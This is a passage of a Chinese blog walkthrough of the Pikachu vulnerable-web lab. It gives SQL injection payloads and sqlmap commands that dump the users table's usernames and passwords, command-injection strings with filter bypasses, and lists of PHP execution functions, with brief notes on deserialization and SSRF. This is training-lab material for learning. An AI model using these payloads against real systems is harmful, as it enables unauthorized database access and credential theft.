<p><img src="/../images/Pasted%20image%2020241208121404.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">id=<span class="hljs-number">-4</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> group_concat(<span class="hljs-built_in">table_name</span>),<span class="hljs-number">2</span> <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">tables</span> <span class="hljs-keyword">where</span> table_schema =<span class="hljs-string">&#x27;pikachu&#x27;</span><br></code></pre></td></tr></table></figure>

<p><img src="/../images/Pasted%20image%2020241208130206.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">id=<span class="hljs-number">-4</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> group_concat(<span class="hljs-built_in">column_name</span>),<span class="hljs-number">2</span> <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">columns</span> <span class="hljs-keyword">where</span> table_schema=<span class="hljs-string">&#x27;pikachu&#x27;</span> <span class="hljs-keyword">and</span> <span class="hljs-built_in">table_name</span>=<span class="hljs-string">&#x27;users&#x27;</span><br></code></pre></td></tr></table></figure>

<p><img src="/../images/Pasted%20image%2020241208130401.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">id=<span class="hljs-number">-4</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> username,<span class="hljs-keyword">password</span>  <span class="hljs-keyword">from</span> users<br></code></pre></td></tr></table></figure>
<p><img src="/../images/Pasted%20image%2020241208132243.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h3 id="字符型注入（get）"><a href="#字符型注入（get）" class="headerlink" title="字符型注入（get）"></a><strong>字符型注入（get）</strong></h3><h4 id="1-SQLMAP"><a href="#1-SQLMAP" class="headerlink" title="1.SQLMAP"></a><strong>1.SQLMAP</strong></h4><figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs perl">python sqlmap.py -u <span class="hljs-string">&quot;http://189.1.232.129:9001/vul/sqli/sqli_str.php?name=111&amp;submit=<span class="hljs-variable">%E</span>6%9F<span class="hljs-variable">%A</span>5<span class="hljs-variable">%E</span>8%AF<span class="hljs-variable">%A2</span>&quot;</span> --dbs --batch<br></code></pre></td></tr></table></figure>

<p><img src="/../images/Pasted%20image%2020241208135939.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs perl">python sqlmap.py -u <span class="hljs-string">&quot;http://189.1.232.129:9001/vul/sqli/sqli_str.php?name=111&amp;submit=<span class="hljs-variable">%E</span>6%9F<span class="hljs-variable">%A</span>5<span class="hljs-variable">%E</span>8%AF<span class="hljs-variable">%A2</span>&quot;</span> -D pikachu --tables --batch<br></code></pre></td></tr></table></figure>
<p><img src="/../images/Pasted%20image%2020241208140120.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs perl">python sqlmap.py -u <span class="hljs-string">&quot;http://189.1.232.129:9001/vul/sqli/sqli_str.php?name=111&amp;submit=<span class="hljs-variable">%E</span>6%9F<span class="hljs-variable">%A</span>5<span class="hljs-variable">%E</span>8%AF<span class="hljs-variable">%A2</span>&quot;</span> -D pikachu -T users --<span class="hljs-keyword">dump</span>  --batch<br></code></pre></td></tr></table></figure>

<p><img src="/../images/Pasted%20image%2020241208140417.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h4 id="2-手工注入"><a href="#2-手工注入" class="headerlink" title="2.手工注入"></a><strong>2.手工注入</strong></h4><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">name</span>=<span class="hljs-number">2</span>&#x27; order by <span class="hljs-number">3</span> %<span class="hljs-number">23</span><br></code></pre></td></tr></table></figure>
<p><img src="/../images/Pasted%20image%2020241208141932.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">name</span>=<span class="hljs-number">1</span>&#x27; union select <span class="hljs-number">1</span>,<span class="hljs-number">2</span><br></code></pre></td></tr></table></figure>
<p><img src="/../images/Pasted%20image%2020241208142108.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs q">name=<span class="hljs-number">1</span>&#x27; <span class="hljs-built_in">union</span> <span class="hljs-keyword">select</span> database(),<span class="hljs-number">2</span> <span class="hljs-keyword">from</span> information_schema.<span class="hljs-built_in">tables</span> <br></code></pre></td></tr></table></figure>
<p><img src="/../images/Pasted%20image%2020241208142524.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs csharp">name=<span class="hljs-number">1&#x27;</span> <span class="hljs-function">union <span class="hljs-keyword">select</span> <span class="hljs-title">group_concat</span>(<span class="hljs-params">table_name</span>),2 <span class="hljs-keyword">from</span> information_schema.tables <span class="hljs-keyword">where</span> table_schema</span> =<span class="hljs-string">&#x27;pikachu&#x27;</span><br></code></pre></td></tr></table></figure>
<p><img src="/../images/Pasted%20image%2020241208142716.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">?name=<span class="hljs-number">1</span><span class="hljs-string">&#x27; union select group_concat(column_name),2 from information_schema.columns where table_schema =&#x27;</span>pikach<span class="hljs-string">u&#x27; and table_name=&#x27;</span>users<span class="hljs-string">&#x27;</span><br></code></pre></td></tr></table></figure>
<p><img src="/../images/Pasted%20image%2020241208142833.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs n1ql">?name=1&#x27; union <span class="hljs-keyword">select</span> username,<span class="hljs-keyword">password</span> <span class="hljs-keyword">from</span> users<br></code></pre></td></tr></table></figure>
<p><img src="/../images/Pasted%20image%2020241208143016.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h3 id="搜索型注入"><a href="#搜索型注入" class="headerlink" title="搜索型注入"></a><strong>搜索型注入</strong></h3><p>闭合方式为<code>%&#39;</code>，与上一关注入的sqlmap使用相同 <a href="#**1.sqlmap**"><strong>sqlmap工具使用</strong></a>，得到如下结果：<br><img src="/../images/Pasted%20image%2020241208145648.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h3 id="xx型注入"><a href="#xx型注入" class="headerlink" title="xx型注入"></a><strong>xx型注入</strong></h3><p>判断闭合方式为<code>&#39;)</code> ,同样可以使用 <a href="#**1.sqlmap**"><strong>sqlmap工具使用</strong></a>：<br><img src="/../images/Pasted%20image%2020241208151851.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></p>
<h3 id="“insert-update”注入"><a href="#“insert-update”注入" class="headerlink" title="“insert&#x2F;update”注入"></a><strong>“insert&#x2F;update”注入</strong></h3><h2 id="RCE-远程系统命令执行"><a href="#RCE-远程系统命令执行" class="headerlink" title="RCE(远程系统命令执行)"></a>RCE(<strong>远程系统命令执行</strong>)</h2><p><strong>低安全等级：</strong></p>
<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs accesslog">#low &amp;&amp;  <br><span class="hljs-number">192.168.187.145</span> &amp; ipconfig<br><span class="hljs-number">192.168.187.145</span> &amp;&amp; ipconfig<br></code></pre></td></tr></table></figure>
<p><strong><img src="/../images/Pasted%20image%2020241208191549.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></strong><br><strong>中安全等级：</strong></p>
<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs accesslog">#Medium &amp; 或&amp;;&amp;  <br><span class="hljs-number">192.168.187.145</span> &amp;;&amp; dir<br></code></pre></td></tr></table></figure>
<p><strong><img src="/../images/Pasted%20image%2020241208193020.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></strong><br><strong>高安全等级：</strong><br><strong>由于过来的字符中包含空格，所以我们将利用这一漏洞，使用<code>|</code>，去掉多余的空格进行绕过：</strong></p>
<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs accesslog">High | （代码里面的|后有一个空格） <br><span class="hljs-number">192.168.187.145</span>|ipconfig<br></code></pre></td></tr></table></figure>
<p> <strong><img src="/../images/Pasted%20image%2020241208193106.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></strong><br> <strong>成功绕过： <img src="/../images/Pasted%20image%2020241208193241.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload></strong></p>
<h3 id="php中可以执行系统命令的函数"><a href="#php中可以执行系统命令的函数" class="headerlink" title="php中可以执行系统命令的函数"></a><strong>php中可以执行系统命令的函数</strong></h3><ol>
<li>assert</li>
<li>exec</li>
<li>shell_exec</li>
<li><code>  </code>(反单引号，一般是linux系统支持，这个以前用来过 </li>
<li>waf）</li>
<li>system</li>
<li>passthru</li>
<li>pcntl_exec</li>
<li>popen</li>
<li>proc_open</li>
</ol>
<h3 id="远程代码执行-php中执行代码的方法"><a href="#远程代码执行-php中执行代码的方法" class="headerlink" title="远程代码执行-php中执行代码的方法"></a><strong>远程代码执行-php中执行代码的方法</strong></h3><ol>
<li>eval</li>
<li>assert</li>
<li>call_user_func</li>
<li>base64_decode,</li>
<li>gzinflate,  </li>
<li>gzuncompress,</li>
<li>gzdecode, </li>
<li>str_rot13</li>
</ol>
<h2 id="PHP反序列化"><a href="#PHP反序列化" class="headerlink" title="PHP反序列化"></a>PHP反序列化</h2><p>在网站开发及互相传输数据的时候，不同的开发语言具有不同的数据存储特性，例如Python存储数据使用字典列表，对于PHP数据中不适用，那就无法互相解析。<br><img src="/../images/Pasted%20image%2020241208212129.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>利用序列化方式可以让数据统一转化成相同的格式的数据及字符串，如json、xml格式的数据等，在解析数据时通过反序列化的方式解析这些数据，进行数据的传输。<br><img src="/../images/Pasted%20image%2020241208212205.png" srcset="/1145615744/1145615744.github.io.git/img/loading.gif" lazyload><br>php代码中有 <strong>序列化serialize()，反序列化unserialize()</strong> 两个函数</p>
<h2 id="SSRF-Server-Side-Request-Forgery-服务器端请求伪造"><a href="#SSRF-Server-Side-Request-Forgery-服务器端请求伪造" class="headerlink" title="SSRF(Server-Side Request Forgery:服务器端请求伪造)"></a>SSRF(Server-Side Request Forgery:服务器端请求伪造)</h2><p>SSRF形成的原因大都是由于服务端<strong>提供了从其他服务器应用获取数据的功能</strong>,但又没有对目标地址做严格过滤与限制，导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据  </p>
<p>数据流:攻击者—–&gt;服务器—-&gt;目标地址  </p>
<p>根据后台使用的函数的不同,对应的影响和利用方法又有不一样</p>
<p>PHP中下面函数的使用不当会导致SSRF:<br>file_get_contents()<br>fsockopen()<br>curl_exec()</p>
<p>防护手段：<br>如果一定要通过后台服务器远程去对用户指定(“或者预埋在前端的请求”)的地址进行资源请求,<strong>则请做好目标地址的过滤</strong>。  </p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Pikachu靶场</div>
      <div>https://github.com/1145615744/1145615744.github.io.git/2024/01/26/Pikachu靶场/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>January 26, 2024</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/1145615744/1145615744.github.io.git/2024/09/02/SQL-libs/" title="SQL-libs">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">SQL-libs</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/1145615744/1145615744.github.io.git/js/events.js" ></script>
<script  src="/1145615744/1145615744.github.io.git/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/1145615744/1145615744.github.io.git/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/1145615744/1145615744.github.io.git/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/1145615744/1145615744.github.io.git/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
